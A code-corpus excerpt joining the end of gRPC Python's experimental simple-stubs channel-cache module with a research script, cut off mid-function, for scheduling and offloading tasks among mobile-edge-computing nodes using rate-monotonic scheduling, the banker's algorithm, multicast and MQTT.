_EVICTION_PERIOD_KEY = "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS"
if _EVICTION_PERIOD_KEY in os.environ:
_EVICTION_PERIOD = datetime.timedelta(
seconds=float(os.environ[_EVICTION_PERIOD_KEY]))
_LOGGER.debug("Setting managed channel eviction period to %s",
_EVICTION_PERIOD)
else:
_EVICTION_PERIOD = datetime.timedelta(minutes=10)
_MAXIMUM_CHANNELS_KEY = "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM"
if _MAXIMUM_CHANNELS_KEY in os.environ:
_MAXIMUM_CHANNELS = int(os.environ[_MAXIMUM_CHANNELS_KEY])
_LOGGER.debug("Setting maximum managed channels to %d", _MAXIMUM_CHANNELS)
else:
_MAXIMUM_CHANNELS = 2**8
def _create_channel(target: str, options: Sequence[Tuple[str, str]],
channel_credentials: Optional[grpc.ChannelCredentials],
compression: Optional[grpc.Compression]) -> grpc.Channel:
# TODO(rbellevi): Revisit the default value for this.
if channel_credentials is None:
raise NotImplementedError(
"channel_credentials must be supplied explicitly.")
if channel_credentials._credentials is grpc.experimental._insecure_channel_credentials:
_LOGGER.debug(f"Creating insecure channel with options '{options}' " +
f"and compression '{compression}'")
return grpc.insecure_channel(target,
options=options,
compression=compression)
else:
_LOGGER.debug(
f"Creating secure channel with credentials '{channel_credentials}', "
+ f"options '{options}' and compression '{compression}'")
return grpc.secure_channel(target,
credentials=channel_credentials,
options=options,
compression=compression)
class ChannelCache:
# NOTE(rbellevi): Untyped due to reference cycle.
_singleton = None
_lock: threading.RLock = threading.RLock()
_condition: threading.Condition = threading.Condition(lock=_lock)
_eviction_ready: threading.Event = threading.Event()
_mapping: Dict[CacheKey, Tuple[grpc.Channel, datetime.datetime]]
_eviction_thread: threading.Thread
def __init__(self):
self._mapping = collections.OrderedDict()
self._eviction_thread = threading.Thread(
target=ChannelCache._perform_evictions, daemon=True)
self._eviction_thread.start()
@staticmethod
def get():
with ChannelCache._lock:
if ChannelCache._singleton is None:
ChannelCache._singleton = ChannelCache()
ChannelCache._eviction_ready.wait()
return ChannelCache._singleton
def _evict_locked(self, key: CacheKey):
channel, _ = self._mapping.pop(key)
_LOGGER.debug("Evicting channel %s with configuration %s.", channel,
key)
channel.close()
del channel
@staticmethod
def _perform_evictions():
while True:
with ChannelCache._lock:
ChannelCache._eviction_ready.set()
if not ChannelCache._singleton._mapping:
ChannelCache._condition.wait()
elif len(ChannelCache._singleton._mapping) > _MAXIMUM_CHANNELS:
key = next(iter(ChannelCache._singleton._mapping.keys()))
ChannelCache._singleton._evict_locked(key)
# And immediately reevaluate.
else:
key, (_, eviction_time) = next(
iter(ChannelCache._singleton._mapping.items()))
now = datetime.datetime.now()
if eviction_time <= now:
ChannelCache._singleton._evict_locked(key)
continue
else:
time_to_eviction = (eviction_time - now).total_seconds()
# NOTE: We aim to *eventually* coalesce to a state in
# which no overdue channels are in the cache and the
# length of the cache is longer than _MAXIMUM_CHANNELS.
# We tolerate momentary states in which these two
# criteria are not met.
ChannelCache._condition.wait(timeout=time_to_eviction)
def get_channel(self, target: str, options: Sequence[Tuple[str, str]],
channel_credentials: Optional[grpc.ChannelCredentials],
compression: Optional[grpc.Compression]) -> grpc.Channel:
key = (target, options, channel_credentials, compression)
with self._lock:
channel_data = self._mapping.get(key, None)
if channel_data is not None:
channel = channel_data[0]
self._mapping.pop(key)
self._mapping[key] = (channel, datetime.datetime.now() +
_EVICTION_PERIOD)
return channel
else:
channel = _create_channel(target, options, channel_credentials,
compression)
self._mapping[key] = (channel, datetime.datetime.now() +
_EVICTION_PERIOD)
if len(self._mapping) == 1 or len(
self._mapping) >= _MAXIMUM_CHANNELS:
self._condition.notify()
return channel
def _test_only_channel_count(self) -> int:
with self._lock:
return len(self._mapping)
@experimental_api
def unary_unary(
request: RequestType,
target: str,
method: str,
request_serializer: Optional[Callable[[Any], bytes]] = None,
response_deserializer: Optional[Callable[[bytes], Any]] = None,
options: Sequence[Tuple[AnyStr, AnyStr]] = (),
channel_credentials: Optional[grpc.ChannelCredentials] = None,
call_credentials: Optional[grpc.CallCredentials] = None,
compression: Optional[grpc.Compression] = None,
wait_for_ready: Optional[bool] = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, Union[str, bytes]]]] = None
) -> ResponseType:
"""Invokes a unary-unary RPC without an explicitly specified channel.
THIS IS AN EXPERIMENTAL API.
This is backed by a per-process cache of channels. Channels are evicted
from the cache after a fixed period by a background. Channels will also be
evicted if more than a configured maximum accumulate.
The default eviction period is 10 minutes. One may set the environment
variable "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS" to configure this.
The default maximum number of channels is 256. One may set the
environment variable "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM" to configure
this.
Args:
request: An iterator that yields request values for the RPC.
target: The server address.
method: The name of the RPC method.
request_serializer: Optional behaviour for serializing the request
message. Request goes unserialized in case None is passed.
response_deserializer: Optional behaviour for deserializing the response
message. Response goes undeserialized in case None is passed.
options: An optional list of key-value pairs (channel args in gRPC Core
runtime) to configure the channel.
channel_credentials: A credential applied to the whole channel, e.g. the
return value of grpc.ssl_channel_credentials() or
grpc.insecure_channel_credentials().
call_credentials: A call credential applied to each call individually,
e.g. the output of grpc.metadata_call_credentials() or
grpc.access_token_call_credentials().
compression: An optional value indicating the compression method to be
used over the lifetime of the channel, e.g. grpc.Compression.Gzip.
wait_for_ready: An optional flag indicating whether the RPC should fail
immediately if the connection is not ready at the time the RPC is
invoked, or if it should wait until the connection to the server
becomes ready. When using this option, the user will likely also want
to set a timeout. Defaults to False.
timeout: An optional duration of time in seconds to allow for the RPC,
after which an exception will be raised.
metadata: Optional metadata to send to the server.
Returns:
The response to the RPC.
"""
channel = ChannelCache.get().get_channel(target, options,
channel_credentials, compression)
multicallable = channel.unary_unary(method, request_serializer,
response_deserializer)
return multicallable(request,
metadata=metadata,
wait_for_ready=wait_for_ready,
credentials=call_credentials,
timeout=timeout)
@experimental_api
def unary_stream(
request: RequestType,
target: str,
method: str,
request_serializer: Optional[Callable[[Any], bytes]] = None,
response_deserializer: Optional[Callable[[bytes], Any]] = None,
options: Sequence[Tuple[AnyStr, AnyStr]] = (),
channel_credentials: Optional[grpc.ChannelCredentials] = None,
call_credentials: Optional[grpc.CallCredentials] = None,
compression: Optional[grpc.Compression] = None,
wait_for_ready: Optional[bool] = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, Union[str, bytes]]]] = None
) -> Iterator[ResponseType]:
"""Invokes a unary-stream RPC without an explicitly specified channel.
THIS IS AN EXPERIMENTAL API.
This is backed by a per-process cache of channels. Channels are evicted
from the cache after a fixed period by a background. Channels will also be
evicted if more than a configured maximum accumulate.
The default eviction period is 10 minutes. One may set the environment
variable "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS" to configure this.
The default maximum number of channels is 256. One may set the
environment variable "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM" to configure
this.
Args:
request: An iterator that yields request values for the RPC.
target: The server address.
method: The name of the RPC method.
request_serializer: Optional behaviour for serializing the request
message. Request goes unserialized in case None is passed.
response_deserializer: Optional behaviour for deserializing the response
message. Response goes undeserialized in case None is passed.
options: An optional list of key-value pairs (channel args in gRPC Core
runtime) to configure the channel.
channel_credentials: A credential applied to the whole channel, e.g. the
return value of grpc.ssl_channel_credentials().
call_credentials: A call credential applied to each call individually,
e.g. the output of grpc.metadata_call_credentials() or
grpc.access_token_call_credentials().
compression: An optional value indicating the compression method to be
used over the lifetime of the channel, e.g. grpc.Compression.Gzip.
wait_for_ready: An optional flag indicating whether the RPC should fail
immediately if the connection is not ready at the time the RPC is
invoked, or if it should wait until the connection to the server
becomes ready. When using this option, the user will likely also want
to set a timeout. Defaults to False.
timeout: An optional duration of time in seconds to allow for the RPC,
after which an exception will be raised.
metadata: Optional metadata to send to the server.
Returns:
An iterator of responses.
"""
channel = ChannelCache.get().get_channel(target, options,
channel_credentials, compression)
multicallable = channel.unary_stream(method, request_serializer,
response_deserializer)
return multicallable(request,
metadata=metadata,
wait_for_ready=wait_for_ready,
credentials=call_credentials,
timeout=timeout)
@experimental_api
def stream_unary(
request_iterator: Iterator[RequestType],
target: str,
method: str,
request_serializer: Optional[Callable[[Any], bytes]] = None,
response_deserializer: Optional[Callable[[bytes], Any]] = None,
options: Sequence[Tuple[AnyStr, AnyStr]] = (),
channel_credentials: Optional[grpc.ChannelCredentials] = None,
call_credentials: Optional[grpc.CallCredentials] = None,
compression: Optional[grpc.Compression] = None,
wait_for_ready: Optional[bool] = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, Union[str, bytes]]]] = None
) -> ResponseType:
"""Invokes a stream-unary RPC without an explicitly specified channel.
THIS IS AN EXPERIMENTAL API.
This is backed by a per-process cache of channels. Channels are evicted
from the cache after a fixed period by a background. Channels will also be
evicted if more than a configured maximum accumulate.
The default eviction period is 10 minutes. One may set the environment
variable "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS" to configure this.
The default maximum number of channels is 256. One may set the
environment variable "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM" to configure
this.
Args:
request_iterator: An iterator that yields request values for the RPC.
target: The server address.
method: The name of the RPC method.
request_serializer: Optional behaviour for serializing the request
message. Request goes unserialized in case None is passed.
response_deserializer: Optional behaviour for deserializing the response
message. Response goes undeserialized in case None is passed.
options: An optional list of key-value pairs (channel args in gRPC Core
runtime) to configure the channel.
channel_credentials: A credential applied to the whole channel, e.g. the
return value of grpc.ssl_channel_credentials().
call_credentials: A call credential applied to each call individually,
e.g. the output of grpc.metadata_call_credentials() or
grpc.access_token_call_credentials().
compression: An optional value indicating the compression method to be
used over the lifetime of the channel, e.g. grpc.Compression.Gzip.
wait_for_ready: An optional flag indicating whether the RPC should fail
immediately if the connection is not ready at the time the RPC is
invoked, or if it should wait until the connection to the server
becomes ready. When using this option, the user will likely also want
to set a timeout. Defaults to False.
timeout: An optional duration of time in seconds to allow for the RPC,
after which an exception will be raised.
metadata: Optional metadata to send to the server.
Returns:
The response to the RPC.
"""
channel = ChannelCache.get().get_channel(target, options,
channel_credentials, compression)
multicallable = channel.stream_unary(method, request_serializer,
response_deserializer)
return multicallable(request_iterator,
metadata=metadata,
wait_for_ready=wait_for_ready,
credentials=call_credentials,
timeout=timeout)
@experimental_api
def stream_stream(
request_iterator: Iterator[RequestType],
target: str,
method: str,
request_serializer: Optional[Callable[[Any], bytes]] = None,
response_deserializer: Optional[Callable[[bytes], Any]] = None,
options: Sequence[Tuple[AnyStr, AnyStr]] = (),
channel_credentials: Optional[grpc.ChannelCredentials] = None,
call_credentials: Optional[grpc.CallCredentials] = None,
compression: Optional[grpc.Compression] = None,
wait_for_ready: Optional[bool] = None,
timeout: Optional[float] = None,
metadata: Optional[Sequence[Tuple[str, Union[str, bytes]]]] = None
) -> Iterator[ResponseType]:
"""Invokes a stream-stream RPC without an explicitly specified channel.
THIS IS AN EXPERIMENTAL API.
This is backed by a per-process cache of channels. Channels are evicted
from the cache after a fixed period by a background. Channels will also be
evicted if more than a configured maximum accumulate.
The default eviction period is 10 minutes. One may set the environment
variable "GRPC_PYTHON_MANAGED_CHANNEL_EVICTION_SECONDS" to configure this.
The default maximum number of channels is 256. One may set the
environment variable "GRPC_PYTHON_MANAGED_CHANNEL_MAXIMUM" to configure
this.
Args:
request_iterator: An iterator that yields request values for the RPC.
target: The server address.
method: The name of the RPC method.
request_serializer: Optional behaviour for serializing the request
message. Request goes unserialized in case None is passed.
response_deserializer: Optional behaviour for deserializing the response
message. Response goes undeserialized in case None is passed.
options: An optional list of key-value pairs (channel args in gRPC Core
runtime) to configure the channel.
channel_credentials: A credential applied to the whole channel, e.g. the
return value of grpc.ssl_channel_credentials().
call_credentials: A call credential applied to each call individually,
e.g. the output of grpc.metadata_call_credentials() or
grpc.access_token_call_credentials().
compression: An optional value indicating the compression method to be
used over the lifetime of the channel, e.g. grpc.Compression.Gzip.
wait_for_ready: An optional flag indicating whether the RPC should fail
immediately if the connection is not ready at the time the RPC is
invoked, or if it should wait until the connection to the server
becomes ready. When using this option, the user will likely also want
to set a timeout. Defaults to False.
timeout: An optional duration of time in seconds to allow for the RPC,
after which an exception will be raised.
metadata: Optional metadata to send to the server.
Returns:
An iterator of responses.
"""
channel = ChannelCache.get().get_channel(target, options,
channel_credentials, compression)
multicallable = channel.stream_stream(method, request_serializer,
response_deserializer)
return multicallable(request_iterator,
metadata=metadata,
wait_for_ready=wait_for_ready,
credentials=call_credentials,
timeout=timeout)
|
1.1_rms_bankers_Speak.py
|
# Author Emeka Ugwuanyi Emmanuel
from functools import reduce
from sys import *
import numpy as np
import random as r
import ping_code as pc
import socket
import struct
import subprocess as sp
from threading import Thread
import threading
import ast
import time
import os
import psutil
import datetime as dt
import getpass as gp
import paho.mqtt.client as mqtt
from netifaces import interfaces, ifaddresses, AF_INET
import smtplib
import config
import paramiko
hosts = {} # {hostname: ip}
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1] # keeps count of how many deadlock is resolved
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
memory = []
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records that’s re-offloaded to mec to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
# received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_task_queue = [] # [(task_list,wait_time), ....]
received_time = []
thread_record = []
port = 65000
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
stop = 0
t_track = 1
task_record = {} # keeps record of task reoffloaded
task_id = 0 # id for each task reoffloaded
shared_resource_lock = threading.Lock()
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(algo.memory_percent(), 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = pc.verbose_ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id, )
connect_client.subscribe('mec')
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time()+['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
'''
else:
print('data: ', data)
elif data[0] == 't':
print('send: ', data[2:])
'''
def connect_to_broker():
global _client
global broker_ip
global topic
username = 'mec'
password = 'password'
broker_ip = 'localhost'
broker_port_no = 1883
topic = 'mec' # topic used to exchange mec details to clients
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_forever()
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
def load_tasks():
period_list = [tasks[i]['period'] for i in tasks]
lcm_period = lcm(period_list)
# insert idle task
s_task = {**tasks, 'idle': {'wcet': lcm_period, 'period': lcm_period + 1}}
return lcm_period, s_task
total_received_task = 0
def scheduler(_lcm_, s_tasks): # RMS algorithm
global total_received_task
queue = list(s_tasks.keys()) # initialize task queue
schedule = []
rms = []
curr = '' # current task
prev = '' # previous task
tmp = {}
for task in s_tasks.keys():
tmp[task] = {} # temporary data for each task
tmp[task]['deadline'] = s_tasks[task]['period']
tmp[task]['executed'] = 0
# start scheduling...
# proceed by one timestamp to handle preemption
for _time_ in range(_lcm_):
# insert new tasks into the queue
for t in tmp.keys():
if _time_ == tmp[t]['deadline']:
if s_tasks[t]['wcet'] > tmp[t]['executed']:
# print('Scheduling Failed at %d' % time)
exit(1)
else:
tmp[t]['deadline'] += s_tasks[t]['period']
tmp[t]['executed'] = 0
queue.append(t)
# select next task to be scheduled
_min_ = _lcm_ * 2
for task in queue:
if tmp[task]['deadline'] < _min_:
_min_ = tmp[task]['deadline']
curr = task
tmp[curr]['executed'] += 1
# print(time, queue, curr)
# dequeue the execution-completed task
if tmp[curr]['executed'] == s_tasks[curr]['wcet']:
for i in range(len(queue)):
if curr == queue[i]:
del queue[i]
break
# record to the schedule trace
if prev != curr:
if prev in queue and prev != 'idle': # previous task is preempted..
s = schedule.pop()
schedule.append([s[0], s[1], '*'])
rms.append(s[1])
schedule.append([_time_, curr])
if curr != 'idle':
rms.append(curr)
prev = curr
process = {task: {'wcet': tasks[task]['wcet']} for task in tasks}
rms = task_time_map(seq=rms, process=process)
total_received_task += len(rms)
return rms
# generate execution sequence using banker's algorithm
def is_safe(processes, avail, _need_, allot, p): # bankers algorithm
need = [_need_[i] for i in _need_]
_allot_ = [allot[i] for i in allot]
# tasks to offload if exit
offload = []
# Number of resources
res = 3
# Mark all processes as unfinished
finish = [0] * p
# To store safe sequence
safe_seq = [0] * p
# Make a copy of available resources
work = [0] * res
for i in range(res):
work[i] = avail[i]
# While all processes are not finished
# or system is not in safe state.
count = 0
while count < p:
# Find a process which is not finish
# and whose needs can be satisfied
# with current work[] resources.
found = False
for t in range(p):
# First check if a process is finished,
# if no, go for next condition
if finish[t] == 0:
# Check if for all resources
# of current P need is less
# than work
for j in range(res):
if need[t][j] > work[j]:
break
# If all needs of p were satisfied.
if j == res - 1:
# Add the allocated resources of
# current P to the available/work
# resources i.e.free the resources
for k in range(res):
work[k] += _allot_[t][k]
# Add this process to safe sequence.
safe_seq[count] = processes[t]
count += 1
# Mark this p as finished
finish[t] = 1
found = True
# If we could not find a next process
# in safe sequence.
if not found:
print("System is not in safe state")
a = list(set(processes) - set(safe_seq) - set(offload))
_max = np.array([0, 0, 0])
n = {}
for i in a:
n[i] = sum(allocation[i[:2]])
_max = max(n, key=n.get)
print('work: ', work, 'need: ', _need[_max[:2]])
offload.append(_max)
work = np.array(work) + np.array(allocation[_max[:2]])
count += 1
# Mark this p as finished
finish[processes.index(_max)] = 1
found = True
# If system is in safe state then
# safe sequence will be as below
if len(offload) > 0:
safe_seq = safe_seq[:safe_seq.index(0)]
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print("System is in safe state.",
"\nSafe sequence is: ", end=" ")
print('safe seq: ', safe_seq)
return safe_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return is_safe(processes, avail, n_need, allot, p)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
# waiting time = total waiting time ÷ 2 average waiting time might be too tight
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # multi-casting waiting time to cooperative MECs
return time_dic
timed_out_tasks = 0
def compare_local_mec(list_seq):
global received_time, timed_out_tasks
execute_mec = []
execute_locally = []
diff = time.time() - received_time.pop(0)
checking_times = {}
for i in list_seq:
t_time[i.split('_')[0]][1]-=diff
# if t_time[i.split('_')[0]][1] < 0:
# _client.publish(i.split('_')[0].split('.')[2], str({i.split('_')[0]: get_time() + ['local']}), )
# timed_out_tasks += 1
if t_time[i.split('_')[0]][1] > list_seq[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
checking_times[i] = {'Latency': t_time[i.split('_')[0]][1], 'Expected_exec_time': list_seq[i]}
print('Execution time comparison:= ', checking_times)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
def algo_id():
no = int(os.path.basename(__file__)[0])
if no <= 2:
return 2
elif no <= 4:
return 3
elif no <= 7:
return 7
elif no <= 10:
return 10
elif no <= 13:
return 12
else:
return 16
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str(['speaker', ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
elif mg == 'update':
ho = hosts.copy()
ho['speaker'] = host_ip
smg = mg + ' ' + str(ho)
sock1.sendto(str.encode(smg), _multicast_group)
send_message('client')
# print('\n===**====**==update message sent===**======**=========')
elif mg == 'client':
ho = hosts.copy()
ho[get_hostname()] = host_ip
smg = f'm {ho}_{algo_id()}'
_client.publish(topic, smg, retain=True)
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message():
global hosts
while True:
if stop == 1:
print('Stopped : receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
# print('received: ', hosts)
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
address[0])) # calcuate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
elif data.decode().strip() == 'user':
send_message('update')
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
outward_mec = 0
offload_check = [0,0]
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
# if len(exec_list) != len(offloaded_task[0]):
# print('\n\n', '@ ' * 50)
# print('exec: ', exec_list, 'off: ', offloaded_task[0])
# print('\n\n', '@ ' * 50)
# offload_check.append((exec_list, offloaded_task[0]))
outward_mec += len(exec_list)
for i in offloaded_task[0]: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
# if j.split('.')[1] != node_id:
# send_offloaded_task_mec('{} {}'.format(j.split('.')[1], j))
# outward_mec += 1
# elif j.split('.')[1] == node_id:
# # send_client({j: get_time()}, send_back_host)
# _client.publish(j.split('.')[2], str({j: get_time()+['local']}), )
# count_task_sent(j)
# _loc += 1
# else:
# print('else execute: ', j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(): # run as a thread
global _inward_mec
global t_track
while True:
if stop == 1:
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
